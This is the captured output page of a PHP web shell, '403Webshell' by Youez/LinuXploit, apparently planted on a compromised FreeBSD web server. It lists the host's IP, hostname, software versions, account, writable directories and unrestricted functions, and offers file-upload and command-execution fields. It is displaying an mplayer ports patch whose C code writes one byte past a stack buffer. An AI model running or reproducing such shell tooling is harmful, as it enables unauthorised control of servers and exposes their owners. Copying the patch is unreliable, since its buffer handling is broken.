403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/multimedia/mplayer/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/multimedia/mplayer/files/patch-gui_wm_ws.c
--- gui/wm/ws.c.orig	2015-11-18 16:16:39 UTC
+++ gui/wm/ws.c
@@ -193,8 +193,18 @@ void wsInit(Display *display)
         int localdisp  = 1;
 
         if (dispname && *dispname != ':') {
-            localdisp = 0;
-            wsUseXShm = False;
+            // check [Bug 206050] x11/slim: force use unix sockets
+            //localdisp = 0;
+            //wsUseXShm = False;
+            const char *udspfx = "unix:";
+            size_t strsz = strlen(udspfx);
+            char substr[strsz];
+            strncpy(substr, dispname, strsz);
+            substr[strsz] = '\0';
+            if(strcmp(substr, udspfx) != 0) {
+                localdisp = 0;
+                wsUseXShm = False;
+            }
         }
 
         mp_msg(MSGT_GPLAYER, MSGL_DBG2, "[ws] display name: %s => %s display.\n", dispname, localdisp ? "local" : "REMOTE");

Youez - 2016 - github.com/yon3zu
LinuXploit